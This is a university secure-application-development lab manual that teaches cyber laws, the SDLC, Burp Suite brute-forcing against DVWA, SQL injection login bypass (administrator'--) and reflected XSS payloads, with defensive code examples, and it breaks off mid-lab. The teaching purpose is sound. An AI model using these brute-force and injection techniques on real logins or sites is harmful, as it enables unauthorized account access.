SAD (Secure Application Development) Lab Manual BE IT 2025-26

The document is a lab manual for the Secure Application Development course (ITL 703) for BE-IT Semester VII for the academic years 2022-2023 and 2025-2026. It outlines the course objectives, experiments, lab objectives, outcomes, and a detailed syllabus covering various aspects of cybersecurity, secure coding, and application vulnerabilities. Additionally, it includes guidelines for students, hardware and software requirements, and references for further reading.


DEPARTMENT OF INFORMATION TECHNOLOGY

Lab Manual

BE-IT Semester VII


ACADEMIC YEAR: 2025 - 2026

Secure Application Development


(ITL 703)
DEPARTMENT OF INFORMATION TECHNOLOGY

Lab Manual

BE-IT Semester VII


ACADEMIC YEAR: 2022 - 2023

Secure Application Development


(ITL 703)

_______________

HOD
Department of IT
Experiment List

Exp. No.  Experiment Name                                             LO Mapping
1         Study of different laws and standards of cyber security.    LO1
2         Case study for SDLC.                                        LO2
3         Online Password attack.                                     LO4
4         Use Burp proxy to test Web Application.                     LO3
5         SQL Injection vulnerability allows login page to bypass.    LO4
6         Cross-Site Scripting (XSS) Vulnerability Lab.               LO4
7         OS Command Vulnerability Lab.                               LO4
8         Unvalidated file upload vulnerability lab.                  LO4
9         Symmetric and Asymmetric.                                   LO6
10        Symmetric Encryption and Hashing.                           LO6
Department of Information Technology

Department’s Vision
To develop competent, skilled, self-disciplined, and ethically sound IT engineers with a professional
attitude to match global standards.
Department’s Mission
M1: To employ innovative teaching techniques and provide experiential knowledge to create proficient
and responsible IT professionals.
M2: To provide sufficient research opportunities and acquaint students with recent trends in industry.
M3: To enhance creativity and entrepreneurial approach to contribute positively to society with lifelong
learning and commitment to professional ethics.
Program Educational Objectives (PEO’s)
PEO1: To expose students to a strong foundation in the field of Information Technology for creating
proficient and responsible IT Professionals.
PEO2: To prepare competent IT Engineers as per global career requirements with the ability to engage
in life-long learning.
PEO3: To equip students to gain proficiency in recognizing and understanding the social, cultural, ethical,
global, and environmental responsibilities of a professional engineer and the need for sustainable
development.
PEO4: To encourage students to develop life skills and gain interest in research, entrepreneurship, and
higher studies in the field of Information Technology.
Program Specific Outcomes (PSO’s)
PSO1: Students will be able to apply the knowledge of Information Technology to Define, Analyze,
Design, Test, and Integrate subsystems to provide domain-specific IT solutions for real-world problems.
PSO2: Students will be able to apply innovative tools and techniques in the field of Information Security,
Data Analytics, Artificial Intelligence, Cloud Computing, and Information Retrieval.
Program Outcomes (PO’s)
PO1: Engineering knowledge: Apply the knowledge of mathematics, science, engineering fundamentals,
and an engineering specialization to the solution of complex engineering problems.
PO2: Problem analysis: Identify, review research literature, and analyze complex engineering problems
reaching substantiated conclusions using first principles of mathematics, and engineering sciences.
PO3: Design/development of solutions: Design solutions for complex engineering problems and design
system components or processes that meet the specified needs with appropriate consideration for
public health and safety, and the cultural, societal, and environmental considerations.
PO4: Conduct investigations of complex problems: Use research-based knowledge and research
methods including design of experiments, analysis, and interpretation of data, and synthesis of the
information to provide valid conclusions.
PO5: Modern tool usage: Create, select, and apply appropriate techniques, resources, and modern
engineering and IT tools including prediction and modeling to complex engineering activities with an
understanding of the limitations.
PO6: The engineer and society: Apply reasoning informed by the contextual knowledge to assess
societal, health, safety, legal and cultural issues, and the consequent responsibilities relevant to the
professional engineering practice.
PO7: Environment and sustainability: Understand the impact of the professional engineering solutions
in societal and environmental contexts, and demonstrate the knowledge of, and need for sustainable
development.
PO8: Ethics: Apply ethical principles and commit to professional ethics and responsibilities and norms of
the engineering practice.
PO9: Individual and teamwork: Function effectively as an individual, and as a member or leader in
diverse teams, and in multidisciplinary settings.
PO10: Communication: Communicate effectively on complex engineering activities with the engineering
community and with society at large, such as being able to comprehend and write effective reports and
design documentation, make effective presentations, and give and receive clear instructions.
PO11: Project management and finance: Demonstrate knowledge and understanding of the engineering
and management principles and apply these to one’s own work, as a member and leader in a team, to
manage projects and in multidisciplinary environments.
PO12: Life-long learning: Recognize the need for and have the preparation and ability to engage in
independent and life-long learning in the broadest context of technological change.
Teaching Scheme and Credits Assigned

Course Code  Course Name                     Teaching Scheme (Contact Hours)   Credits Assigned
                                             Theory  Practical  Tutorial      Theory  Practical & Oral  Tutorial  Total
ITL703       Secure Application Development  --      2          --            --      1                 --        01

Examination Scheme

Course Code  Course Name                     Theory Marks                                           Term Work  Practical/Oral  Total
                                             Internal Assessment                 End Sem. Exam
                                             Test 1  Test 2  Avg. of 2 Tests
ITL703       Secure Application Development  --      --      --                  --                 25         25              50
Lab Objectives:

Sr. No  Lab Objectives

The lab experiments aim:

1  To understand the secure programming of application code.
2  To understand the OWASP methodologies and standards.
3  To understand and identify the main vulnerabilities inherent in applications.
4  To understand how data validation and authentication can be applied to an application.
5  To understand how to apply security at the session layer (session management).
6  To understand how to apply secure coding for cryptography.

Lab Outcomes:

Sr. No  Lab Outcomes                                         Cognitive levels of attainment as per Bloom’s Taxonomy

On successful completion of the course, the learner/student will be able to:

1  Apply secure programming of application code.             L1, L2, L3
2  Understand the OWASP methodologies and standards.          L1, L2, L3
3  Identify main vulnerabilities inherent in applications.    L1, L2, L3
4  Apply Data Validation and Authentication for application.  L1, L2, L3, L4, L5
5  Apply Security at Session Layer Management.                L1, L2, L3, L4, L5
6  Apply secure coding for cryptography.                      L1, L2, L3, L4, L5

Hardware & Software requirements:

Hardware Specifications               Software Specifications
PC with the following configuration:  Web Application, HTML5, CSS3, Java, C, Python,
1. Intel Core i3/i5/i7                MySQL or Database Software.
2. 4 GB RAM                           Internet Connection, Browser, Security tools, SAST
3. 500 GB Hard disk                   tools etc.

Prerequisite: Knowledge of programming languages like Java/Python/C is required.

DETAILED SYLLABUS:

Sr. No.  Module  Detailed Content  Hours  LO Mapping

0  Prerequisite
   Programming Language and Web application basic concepts.
   Hours: 02

I  Introduction to Secure Programming
   Introduction to laws, standards and guidelines of cyber security. What do you mean by attacks,
   types of attacks and statistics of main vulnerabilities?
   Lab1: Study of different laws and standards of cyber security.
   Hours: 04   LO Mapping: LO1

II  Methodologies for developing secure code
   Software Development Lifecycle. Risk Analysis. Threat Modeling. Study different SAST (Static
   Application Security Testing) tools. Study different top 10 methodologies and guidelines of OWASP
   (Open Web Application Security Project) for secure application development. Any top 5 OAT. Best
   eight guidelines for Secure Coding. Understand the flow of Verification testing for secure coding.
   Lab2: Case study for SDLC.
   Lab3: Exercise on Threat Modeling.
   Lab4: Study of SAST Tools (open source, like GitHub, GitLab and so on) and use at least one for practical.
   Lab5: Study and implement at least any 5 methodologies of OWASP.
   Lab6: Study and implement at least any 5 OAT (e.g. Denial of Inventory for an E-commerce Website).
   Hours: 06   LO Mapping: LO2

III  VAPT of Applications
   Introduction to the HTTP protocol. OWASP Web Security Testing Guidelines. Tools for VAPT testing.
   Lab7: Use Burp proxy to test web applications.
   Hours: 04   LO Mapping: LO3

IV  Data Validation & Authentication
   Guidelines for input data validation (Data type, Data size, Data range, Data Content etc.) and
   authentication for login page. Types of Authentication attacks. Study different types of
   vulnerabilities like SQL Injection vulnerability, LDAP and XPath Injection vulnerabilities, Cross Site
   Scripting (XSS) vulnerability, OS Command, LFI/RFI, Unvalidated file upload and buffer overflow etc.
   Lab8: Registration Page Data Validation.
   Lab9: SQL injection vulnerability allows login page to bypass.
   Lab10: LDAP and XPath Injection vulnerabilities for login / registration page.
   Lab11: Cross-Site Scripting (XSS) vulnerability Lab.
   Lab12: OS Command vulnerability Lab.
   Lab13: LFI/RFI or Unvalidated file upload or Buffer Overflow vulnerability Lab.
   Lab14: Online Password attack.
   Hours: 05   LO Mapping: LO4

V  Security in Session Layer
   Introduction to Session Layer in Web Applications and management. Session Management Best
   practices according to OWASP.
   Lab15: Session Management for Web Application.
   Hours: 03   LO Mapping: LO5

VI  Secure Coding for cryptography
   Overview of cryptography and guidelines for using encryption. Types of cryptography, i.e. symmetric and
   asymmetric. Hashing Algorithms etc.
   Lab16: Symmetric and Asymmetric.
   Lab17: Symmetric Encryption and Hashing.
   Hours: 02   LO Mapping: LO6

Text & Reference Books:

1. Fundamental Practice for Secure Software Development.
2. The OWASP Automated Threat Handbook - Web Applications.
3. OWASP Alpha Release Code Review Guide 2.0
4. Secure Programming HOWTO
5. OWASP Quick reference guide 2.

Online References:

Sr. No.  Website Links

1  https://www.udemy.com/course/secure-coding-secure-application-development/
2  https://kirkpatrickprice.com/blog/secure-coding-best-practices/
3  https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT 021_Denial_of_Inventory

Term Work:

Term Work shall consist of at least 10 to 12 practicals based on the above list. The Term Work Journal must
also include at least 2 assignments as mentioned in the above syllabus.

Term Work Marks: 25 Marks (Total marks) = 15 Marks (Experiments) + 5 Marks (Assignment) + 5 Marks (Attendance)

Oral Exam: An Oral exam will be held based on the above syllabus.
Guidelines to Students:

1. Equipment in the lab is for the use of the student community. Students need to maintain proper
decorum in the lab. Students must use the equipment with care. Any damage caused is
punishable.
2. Students are required to carry their completed experiment file while entering the lab.
3. Students are supposed to occupy the machines allotted to them and are not supposed to talk or
make noise in the lab.
4. The lab can be used in free time / lunch hours; students who need to use the systems should
take prior permission from the lab in-charge.

Do’s and Don’ts in the Lab:

Do’s:-

1. Proper uniform has to be maintained while entering the Lab. (Boys tucked-in and girls should be
neatly dressed.)
2. Students should carry observation notes and records completed in all aspects.
3. Students should be aware of the next experiment before coming to the lab.
4. Students should be at their concerned table; unnecessary movement is to be restricted.
5. Students should follow the procedure to start implementing the experiment with the permission
of the faculty-incharge / lab assistant. They need to switch on their respective systems and after
completing the same they need to switch them off and keep the chairs in order.
6. The practical result should be noted down in their lab-book and the result must be shown to the
faculty-incharge for verification.
7. Students must ensure that all switches are in the OFF position and all the systems are shut down
properly before leaving the lab.

Don’ts:-

1. Don’t come late to the Lab.
2. Don’t leave the Lab without shutting down all the systems and keeping the chairs in order.
3. Don’t leave the Lab without verification by the faculty-incharge / lab assistant.
4. Don’t leave the lab without the permission of the faculty In-Charge.
Experiment no 1

Aim - Study of different laws and standards of cyber security.


Learning Objective - Gain a comprehensive understanding of various cybersecurity laws and standards
to ensure effective protection of digital assets and data.

Course Objectives -

Theory :

Different Laws of Cyber security

● Information Technology (IT) Act, 2000: Purpose: Addresses various cybercrimes and provides
legal provisions for electronic transactions and data protection.

● Personal Data Protection Bill (Draft): Purpose: Aims to regulate the collection, processing, and
storage of personal data and protect individuals' privacy rights.

● Reserve Bank of India (RBI) Guidelines on Cyber Security: Purpose: Sets cybersecurity standards
for banks and financial institutions to safeguard customer data and financial systems.

● National Cyber Security Policy (NCSP): Purpose: Outlines India's strategic approach to strengthen
its cybersecurity posture and protect critical information infrastructure.

● Indian Computer Emergency Response Team (CERT-In): Purpose: Serves as the national agency
for responding to cybersecurity incidents and promoting cybersecurity awareness.

● COPPA - U.S. online privacy protection for children under 13.

Standards of Cyber security

● ISO/IEC 27001: Information Security Management System framework.

● ISO/IEC 27002: Guidelines for information security controls.

● NIST Cybersecurity Framework: Guidelines for risk management.

● PCI DSS: Standards for cardholder data protection.

● CIS Controls: Prioritized cybersecurity actions.

● IEC 62443: Security guidelines for industrial systems.


Learning Outcome :
Conclusion:
Experiment no 2

Aim - Case Study for SDLC

Learning Objective - Understand the SDLC process and its application in redesigning and implementing
a successful e-commerce platform.

Course Objectives - Develop a practical understanding of SDLC principles and best practices through a
real-world case study on redesigning and implementing an e-commerce platform.

Introduction: This case study focuses on the Software Development Life Cycle (SDLC) for the redesign
and implementation of an online retail platform, "ShopX," to enhance user experience, improve
performance, and increase sales. The project was undertaken by a leading e-commerce company, "E-
Commerce Co.," aiming to revamp their existing platform to meet the evolving demands of customers
and to stay ahead in a highly competitive market.

● Project Initiation: The project began with a thorough analysis of the existing e-commerce
platform, considering performance, user feedback, and market trends. Key stakeholders,
including the project manager, business analysts, technical architects, and department
representatives, defined the project's scope, objectives, and budget.

● Planning and Requirement Gathering: The planning phase involved setting milestones, allocating
resources, and creating user stories, use cases, and functional specifications. Critical features
were prioritized based on business value and complexity.

● Design and Architecture: Technical architects and UI/UX designers collaborated to create a
scalable, reliable, and secure platform architecture. Mockups and wireframes were used to
gather feedback.

● Development and Implementation: Following Agile methodologies, the development team
coded new features and functionalities. Continuous integration and automated testing ensured
code quality and early bug detection. The platform was deployed on a staging server for further
testing.

● Testing and Quality Assurance: Multiple rounds of testing, including functional, performance,
security, and user acceptance testing, were conducted. The QA team worked closely with
developers to address issues and ensure compliance with requirements.

● Deployment and Release: After obtaining stakeholder approval, the platform was deployed to
production with minimal downtime. The team monitored performance and responded promptly
to any issues.

● Maintenance and Support: Post-launch, the platform entered the maintenance phase. The team
addressed user feedback, implemented updates, and provided support to handle user inquiries
and technical issues.
Conclusion: The successful implementation of the new online retail platform, "ShopX," through a well-
structured Software Development Life Cycle (SDLC) process led to improved user experience and
increased sales. The collaboration of cross-functional teams, adherence to best practices, and focus on
quality throughout the project were key factors in its success. The enhanced features and performance
helped the company maintain its competitive edge and achieve its business objectives.
Experiment 3

Aim - Online Password attack.

Learning Objective -

Theory:

What is an Online Password Attack?

An online password attack is a cyberattack where an attacker attempts to gain unauthorized access to a
user's account by guessing or cracking their password. These attacks are typically carried out by using
automated tools that can rapidly try different combinations of usernames and passwords until they find
a match.

There are two main types of online password attacks:

1. Brute Force Attacks: These attacks involve trying every possible combination of characters until
the correct password is found. This method is time-consuming and computationally expensive,
but it can be successful if the password is weak or short.

2. Dictionary Attacks: These attacks use a pre-defined list of common passwords or variations of
those passwords to try and guess the correct one. This method is faster than brute force attacks,
but it is only successful if the user's password is on the list.

How to Protect Yourself from these types of Attacks?

1. Strong Passwords: Use long, complex passwords with a mix of characters.

2. Unique Passwords: Avoid reusing passwords across different accounts.

3. Password Manager: Employ a password manager to securely store and manage passwords.

4. Two-Factor Authentication (2FA): Enable 2FA for an extra layer of security.

5. Cautious Clicking: Avoid clicking on suspicious links or attachments in emails or messages.

6. Software Updates: Keep software and operating systems up to date.

7. Social Engineering Awareness: Be wary of social engineering tactics aimed at tricking you into
revealing personal information.

Learning Outcome :

Conclusion:
Demonstration of Online Password Attack.

Download Burp Suite:

Visit the official PortSwigger website to download Burp Suite.

You'll have the option to download the free Community Edition or the paid Professional Edition. Choose
the edition that suits your needs.

Choose Your Operating System:

Burp Suite is available for Windows, macOS, and Linux. Select the version that matches your operating
system.

Install Burp Suite:

The installation process may vary depending on your operating system.

● For Windows:

Double-click the downloaded installer (e.g., burpsuite_community_<version>.exe).

Follow the on-screen instructions to install Burp Suite.

● For Linux:

Open a terminal.

Navigate to the directory where the downloaded Burp Suite installer is located. Run the installer
script using a command similar to the following:
sudo sh ./burpsuite_community_linux_v<version>_sh.run

Follow the on-screen instructions to complete the installation.

Launch Burp Suite:

After installation, you can launch Burp Suite from your applications menu or by executing the
appropriate command in your terminal.

For Brute-forcing logins with Burp Suite, we will use DVWA (Damn Vulnerable Web Application).

What is DVWA?
DVWA (Damn Vulnerable Web Application): DVWA is a deliberately vulnerable web application
designed for educational and training purposes in the field of cybersecurity. It contains various common
web application vulnerabilities that users can practice exploiting and securing in a controlled
environment.

1. Open Burp Suite and start the browser (Proxy Tab > Open Browser).

2. Access the target using the browser provided by Burp Suite; if you observe, Burp Suite will
record your traffic from the browser. It means the browser is connected to the software.

3. Fill in the username and password form but don’t press login; here I fill in the username ‘admin’ and
password ‘test’.

4. Back in the browser, click login, and look at Burp Suite; the traffic will be recorded.

5. Right-click on the recorded request in Burp Suite and choose Send to Intruder. Go to the Intruder tab, and before making
changes to anything, click Clear to remove the “§” signs.

6. All the “§” signs will be gone, and it will look like this.

7. Next, select the username value and click Add to add the “§” signs there.

8. Do the same thing for the password. Do it sequentially.

9. Because we are going to brute force more than one parameter (username and password), choose
Cluster bomb in attack types.

10. Next, go to the Payloads section and look at the Payload set below; it will consist of two parameters,
the first for the username and the second for the password, based on which position you added first.

11. In the Payload set, you have the option to enter the payloads manually or simply click Load to load a
wordlist file. As previously mentioned, the first parameter represents the username, while the second
represents the password.

12. Once everything is set, the indicator of whether the brute force succeeded is the Length column; if one
response shows a different length, that attempt succeeded.

13. Because the length is different, look at the response or try logging in using that account.

We have successfully managed to crack the password using a Brute Force Attack.
Experiment 4

Aim - Use Burp proxy to test Web Application.

Learning Objective - Learn how to use Burp Proxy to intercept and analyze HTTP traffic, identify common
web application vulnerabilities, and perform security testing effectively.

Theory:

What is Burp Suite?

Burp Suite is a popular web application security testing tool. It acts as an intercepting proxy server that
sits between the user's web browser and the target web application. It allows security professionals and
developers to capture, inspect, and modify HTTP/HTTPS requests and responses, making it a valuable
tool for identifying security vulnerabilities and conducting in-depth security assessments of web
applications.

Key Features:

● Proxy: Burp Suite acts as an intercepting proxy, allowing you to capture and modify HTTP
requests and responses between your browser and the web server.

● Scanner: It includes an automated scanner that can identify common web vulnerabilities such as
SQL injection, cross-site scripting (XSS), and more.

● Repeater: This tool allows you to manipulate and resend individual HTTP requests to the server
for testing and analysis.

● Intruder: The Intruder tool is used for automating custom attacks against web applications, such
as brute force or fuzzing attacks.

● Spider: Burp Spider is used to crawl a website and discover its structure and content.

● Sequencer: This tool analyzes the randomness of tokens generated by the application to identify
potential security weaknesses.

● Decoder: It provides various encoding and decoding functions for analyzing and manipulating
data.

Why is Burp Suite used?

Burp Suite is a widely used and highly regarded tool in the field of cybersecurity and web application
security for several critical reasons:

1. Web Application Vulnerability Assessment:


Burp Suite is primarily used to identify and assess security vulnerabilities in web applications. It helps
security professionals and ethical hackers discover weaknesses that malicious attackers could exploit.
This includes vulnerabilities such as SQL injection, cross-site scripting (XSS), and more.

2. Manual Testing and Analysis:

Security experts use Burp Suite for manual testing and analysis. It allows them to intercept and
manipulate HTTP requests and responses, providing deep insight into how the application behaves and
responds to different inputs.

3. Custom Attacks and Fuzzing:

The Intruder tool in Burp Suite enables testers to automate custom attacks, including brute force,
fuzzing, and more. This helps identify vulnerabilities that may not be detected by automated scanners.

4. Penetration Testing:

Burp Suite is an essential tool in penetration testing engagements. Penetration testers use it to simulate
real-world attacks on web applications and assess an organization's security posture.

5. Comprehensive Reporting:

Burp Suite generates detailed reports that provide a clear overview of identified vulnerabilities, their
severity, and recommended remediation steps. These reports are valuable for communication with
stakeholders and developers.

6. Education and Training:

Burp Suite is also used in cybersecurity education and training programs to teach students and
professionals about web application security concepts, techniques, and tools.

Learning Outcome :

Conclusion:

Demonstration of using Burp proxy to test Web Application.

Download Burp Suite:

Visit the official PortSwigger website to download Burp Suite.

You'll have the option to download the free Community Edition or the paid Professional Edition. Choose
the edition that suits your needs.

Choose Your Operating System:


Burp Suite is available for Windows, macOS, and Linux. Select the version that matches your operating
system.

Install Burp Suite:

The installation process may vary depending on your operating system.

● For Windows:

Double-click the downloaded installer (e.g., burpsuite_community_<version>.exe).

Follow the on-screen instructions to install Burp Suite.

● For Linux:

Open a terminal.

Navigate to the directory where the downloaded Burp Suite installer is located. Run the installer
script using a command similar to the following:
sudo sh ./burpsuite_community_linux_v<version>_sh.run

Follow the on-screen instructions to complete the installation.

Launch Burp Suite:

After installation, you can launch Burp Suite from your applications menu or by executing the
appropriate command in your terminal.

For Brute-forcing logins with Burp Suite, we will use DVWA (Damn Vulnerable Web Application).

What is DVWA?

DVWA (Damn Vulnerable Web Application): DVWA is a deliberately vulnerable web application
designed for educational and training purposes in the field of cybersecurity. It contains various common
web application vulnerabilities that users can practice exploiting and securing in a controlled
environment.

1. Open Burp Suite and start the browser (Proxy Tab > Open Browser).

2. Access the target using the browser provided by Burp Suite; if you observe, Burp Suite will
record your traffic from the browser. It means the browser is connected to the software.

3. Fill in the username and password form but don’t press login; here I fill in the username ‘admin’ and
password ‘test’.

4. Back in the browser, click login, and look at Burp Suite; the traffic will be recorded.

5. Right-click on the recorded request in Burp Suite and choose Send to Intruder. Go to the Intruder tab, and before making
changes to anything, click Clear to remove the “§” signs.

6. All the “§” signs will be gone, and it will look like this.

7. Next, select the username value and click Add to add the “§” signs there.

8. Do the same thing for the password. Do it sequentially.

9. Because we are going to brute force more than one parameter (username and password), choose
Cluster bomb in attack types.

10. Next, go to the Payloads section and look at the Payload set below; it will consist of two parameters,
the first for the username and the second for the password, based on which position you added first.

11. In the Payload set, you have the option to enter the payloads manually or simply click Load to load a
wordlist file. As previously mentioned, the first parameter represents the username, while the second
represents the password.

12. Once everything is set, the indicator of whether the brute force succeeded is the Length column; if one
response shows a different length, that attempt succeeded.

13. Because the length is different, look at the response or try logging in using that account.

We have successfully managed to crack the password using a Brute Force Attack.

Protection Against These Attacks

We can defend against various types of attacks when we employ the right methods. Brute force attacks
involve a form of trial and error and can be quite time and resource-intensive. There are several ways to
prevent such attacks:

1. Enhance web security by adding additional layers, such as tokenization for usernames and
passwords.

2. Implement login limitations, which can deter attackers by limiting the number of login attempts.

3. Apply encoding to input parameters to protect against injection attacks and other malicious
input.
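As an added example (not part of the lab manual), the Python below implements the "login limitations" countermeasure from the list above and replays the Intruder cluster-bomb pattern from the Experiment 3 demonstration against it; the usernames, wordlist, salt and timings are all constructed for the demo. It also returns the same failure body for every rejected attempt, so the Length column that the demonstration relies on no longer singles out the hit.

```python
"""Added example, not from the lab manual: account lockout plus uniform failure
responses, replayed against a simulated Intruder 'cluster bomb' run."""
import hashlib
import hmac
from collections import defaultdict

# Constructed demo values (not real credentials or a production KDF setting).
_SALT = b"demo-salt-not-for-production"
_ITERATIONS = 50_000


def _hash_pw(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, _ITERATIONS)


USERS = {"admin": _hash_pw("S3cure!Passw0rd")}   # constructed user store
_DUMMY = _hash_pw("dummy")                        # compared for unknown users
FAIL_BODY = "Login failed"                        # identical for every failure


class LoginGuard:
    """Locks an account after max_failures consecutive failed attempts."""

    def __init__(self, max_failures=5, lockout_seconds=300):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.failures = defaultdict(int)   # username -> consecutive failures
        self.locked_until = {}             # username -> unix time lock expires

    def attempt(self, username, password, now):
        until = self.locked_until.get(username)
        if until is not None and now < until:
            # Locked accounts get the same body as any other failure.
            return {"status": "locked", "body": FAIL_BODY}
        stored = USERS.get(username)
        # Always hash and compare, even for unknown users, so that response
        # time and body do not reveal whether the account exists.
        expected = stored if stored is not None else _DUMMY
        match = hmac.compare_digest(expected, _hash_pw(password))
        if match and stored is not None:
            self.failures[username] = 0
            return {"status": "ok", "body": "Welcome"}
        self.failures[username] += 1
        if self.failures[username] >= self.max_failures:
            self.locked_until[username] = now + self.lockout_seconds
            self.failures[username] = 0
        return {"status": "denied", "body": FAIL_BODY}


# Constructed payload sets: one for the username position, one for the password.
USERNAMES = ["admin", "user"]
WORDLIST = ["test", "password", "123456", "admin", "letmein", "S3cure!Passw0rd"]


def run_cluster_bomb(max_failures=5):
    """Replay every username x password combination against a fresh guard and
    summarise what the attacking tool would observe."""
    guard = LoginGuard(max_failures=max_failures)
    summary = {"ok": 0, "denied": 0, "locked": 0}
    lengths = set()
    now = 1_700_000_000.0          # constructed start time (unix seconds)
    for user in USERNAMES:
        for pw in WORDLIST:
            resp = guard.attempt(user, pw, now)
            summary[resp["status"]] += 1
            lengths.add(len(resp["body"]))
            now += 0.2             # tool fires one request every 200 ms
    summary["distinct_lengths"] = len(lengths)
    return summary


if __name__ == "__main__":
    print("with lockout (5 failures):", run_cluster_bomb(max_failures=5))
    print("without lockout:", run_cluster_bomb(max_failures=100))
```

With the lockout in place the correct password is never accepted, because it is the sixth guess and the account locked on the fifth; disabling the limit (max_failures=100) lets the same run succeed.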
Experiment 5

Aim - SQL Injection vulnerability allows login page to bypass.

Learning Objective -

Theory:

What is SQL injection (SQLi)?

SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries
that an application makes to its database. This can allow an attacker to view data that they are not
normally able to retrieve. This might include data that belongs to other users, or any other data that the
application can access. In many cases, an attacker can modify or delete this data, causing persistent
changes to the application's content or behavior.

What is the impact of a successful SQL injection attack?

A successful SQL injection attack can result in unauthorized access to sensitive data, such as:

● Passwords.

● Credit card details.

● Personal user information.

SQL injection attacks have been used in many high-profile data breaches over the years. These have
caused reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent
backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for
an extended period.

How to detect SQL injection vulnerabilities

You can detect SQL injection manually using a systematic set of tests against every entry point in the
application. To do this, you would typically submit:

● The single quote character ' and look for errors or other anomalies.

● Some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a
different value, and look for systematic differences in the application responses.

● Boolean conditions such as OR 1=1 and OR 1=2, and look for differences in the application's
responses.

● Payloads designed to trigger time delays when executed within a SQL query, and look for
differences in the time taken to respond.
SQL injection examples

There are many SQL injection vulnerabilities, attacks, and techniques that occur in different situations.
Some common SQL injection examples include:

● Retrieving hidden data, where you can modify a SQL query to return additional results.

● Subverting application logic, where you can change a query to interfere with the application's
logic.

● UNION attacks, where you can retrieve data from different database tables.

● Blind SQL injection, where the results of a query you control are not returned in the application's
responses.

Learning Outcome :

Conclusion:

Lab: SQL injection vulnerability allowing login bypass

This lab contains a SQL injection vulnerability in the login function.

To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.

Head over to the login page.

When we input a username and password, the query string will look like:

SELECT * FROM users WHERE username = 'admin' AND password = 'password'

I input a single quote in the username and login (same with password). Both result in an internal server
error, which shows that it might be vulnerable to SQL injection.
If we input:

administrator'--

SELECT * FROM users WHERE username = 'administrator'--' AND password = 'anythingrandom'

In this query the -- turns the rest of the line, AND password = 'anythingrandom', into a comment, so only
the username 'administrator' is checked and the login succeeds as the administrator account.
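The login query above, built by string concatenation, beside a parameterized version, as an added example that is not the lab's own code. It uses an in-memory SQLite database with constructed rows so it runs offline.

```python
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed sample rows (plain-text passwords only for the demonstration).
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("administrator", "s3cr3t-admin"), ("wiener", "peter")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Mirrors the lab's query: user input spliced straight into the SQL text.

    With username administrator'-- the closing quote ends the string early and
    -- comments out the rest of the line, so the password check disappears.
    A lone ' leaves an unterminated string and raises an error, which is the
    'internal server error' the lab observes."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: SQL text and values travel separately, so a quote
    or -- inside the input is only data and never changes the statement."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None
```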
Experiment 6

Aim - Cross-Site Scripting XSS Vulnerability Lab.

Learning Objective -

Theory:

What is cross-site scripting (XSS)?

Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the
code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious
link to a user and enticing the user to click it. If the app or website lacks proper data sanitization, the
malicious link executes the attacker’s chosen code on the user’s system. As a result, the attacker can
steal the user’s active session cookie.

How does XSS work?

<script>alert(1)</script>
OR
<script>print(1)</script>

While the payload is usually JavaScript, XSS can take place using any client-side language.

To carry out a cross-site scripting attack, an attacker injects a malicious script into user-provided input.
Attackers can also carry out an attack by modifying a request. If the web app is vulnerable to XSS attacks,
the user-supplied input executes as code. There are many ways to trigger an XSS attack. For example,
the execution could be triggered automatically when the page loads or when a user hovers over specific
elements of the page (e.g., hyperlinks).

Potential consequences of cross-site scripting attacks include:

● Capturing the keystrokes of a user

● Redirecting a user to a malicious website

● Running web browser–based exploits (e.g., crashing the browser)

● Obtaining the cookie information of a user who is logged into a website, thus compromising the
victim's account

In some cases, the XSS attack leads to a complete compromise of the victim’s account. Attackers can
trick users into entering credentials on a fake form, which provides all the information to the attacker.

Types of XSS attacks

There are three main types of XSS attacks. These are:

● Reflected XSS, where the malicious script comes from the current HTTP request.

● Stored XSS, where the malicious script comes from the website's database.

● DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.

How can you avoid XSS vulnerabilities?

1. Input Validation:
Validate and sanitize user input to block harmful characters.
2. Output Encoding:
Encode output data before rendering it in HTML or JavaScript.
3. Content Security Policy (CSP):
Implement a CSP to control script execution.
4. Keep Software Updated:
Update all components and libraries regularly.
5. Regular Security Audits:
Conduct code reviews and security audits.
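Items 2 and 3 of the list above, output encoding and a Content Security Policy, as an added example that is not the lab's code. The search-results template is constructed to resemble the reflected search page used later in this experiment.

```python
import html

# Constructed template standing in for the lab's search results page.
TEMPLATE = "<h1>{count} search results for '{term}'</h1>"


def render_search_unencoded(term, count=0):
    """Reflects the raw search term (the lab's flaw): a <script> tag in the
    input becomes live markup in the page and the browser executes it."""
    return TEMPLATE.format(count=count, term=term)


def render_search_encoded(term, count=0):
    """Entity-encodes the term for an HTML text context. & < > " ' become
    entities, so the browser shows &lt;script&gt; as text and runs nothing."""
    return TEMPLATE.format(count=count, term=html.escape(term, quote=True))


def contains_live_tag(page, tag="script"):
    """Check used here to show the difference: is there an actual <tag ...>
    element in the output, or only encoded text?"""
    return f"<{tag}" in page.lower()


def csp_header():
    """Defence in depth: a policy that disallows inline scripts, so a reflected
    <script> block would not run even if encoding were missed somewhere.
    Constructed policy; a real site adds its own script and asset origins."""
    return ("Content-Security-Policy",
            "default-src 'self'; script-src 'self'; object-src 'none'")
```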

Learning Outcome :

Conclusion:

Lab: Reflected XSS into HTML context with nothing encoded

The web application has a search function and prints the search string to the interface.
Checking the HTML source code, we can see that the search string is passed directly in without validation
→ reflected XSS.

Search for the string:

<script>alert(1)</script> # An alert box will appear.

OR

<script>print(1)</script> # A print dialog box will appear.

At this point we have successfully solved the Reflected XSS Lab.

Lab: Stored XSS into HTML context with nothing encoded

After submitting a comment, check the page source: the Comment, Name and Website fields are rendered
